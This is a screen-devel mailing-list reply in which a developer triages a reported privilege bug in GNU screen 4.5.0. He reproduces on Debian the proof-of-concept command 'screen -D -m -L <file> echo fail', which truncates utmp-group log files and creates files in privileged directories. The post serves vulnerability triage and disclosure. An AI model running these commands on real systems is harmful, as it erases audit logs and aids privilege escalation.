[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [screen-devel] [bug #50142] root exploit 4.5.0
From: |
Axel Beckert |
Subject: |
Re: [screen-devel] [bug #50142] root exploit 4.5.0 |
Date: |
Tue, 24 Jan 2017 21:30:55 +0100 |
User-agent: |
Mutt/1.5.21 (2010-09-15) |
Hi,
not replying on Savannah as I don't yet get the exact impact of this.
On Tue, Jan 24, 2017 at 07:05:10PM +0000, anonymous wrote:
> > address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> > address@hidden:/etc (master)$ ls -l bla.bla
> > -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> > address@hidden:/etc (master)$ cat bla.bla
> > fail
> > address@hidden:/etc (master)$
On Debian Unstable this does not work as a root exploit as screen does
not run setuid. screen nevertheless runs setgid with group utmp:
-rwxr-sr-x 1 root utmp 457608 Jan 18 16:54 /usr/bin/screen*
So I'm able to gain access to /var/log/{btmp,wtmp,lastlog}*.
I though can't really write to it, just erase it:
/var/log → id
uid=1000(abe) gid=1000(abe)
groups=1000(abe),4(adm),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev),113(kvm)
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 384 Dec 24 17:03 btmp.1
/var/log → screen -D -m -L btmp.1 echo fail
/var/log → ls -l btmp.1
-rw-rw---- 1 root utmp 0 Jan 24 21:06 btmp.1
So in my case nothing got written into the file (trying an existing
file without write permissions to the according directory).
Running the same game in /var/run/screen which is group-writable for
utmp, I though can reproduce this a little bit better:
/var/run/screen → ls -l
total 0
drwx------ 2 abe abe 40 Jan 24 21:17 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
/var/run/screen → screen -D -m -L bla.bla echo fail
/var/run/screen → ls -l
total 4
drwx------ 2 abe abe 40 Jan 24 21:20 S-abe/
drwx------ 2 root root 60 Jan 16 00:23 S-root/
-rw-r--r-- 1 abe utmp 6 Jan 24 21:20 bla.bla
/var/run/screen → cat bla.bla
fail
/var/run/screen →
Am I right that, since screen later drops the set[ug]id rights, this
only works if the file is newly created because then it is created
with such permissions that I can later write into it without
set[ug]id?
Kind regards, Axel
--
/~\ Plain Text Ribbon Campaign | Axel Beckert
\ / Say No to HTML in E-Mail and News | address@hidden (Mail)
X See http://www.nonhtmlmail.org/campaign.html | address@hidden (Mail+Jabber)
/ \ I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/ (Web)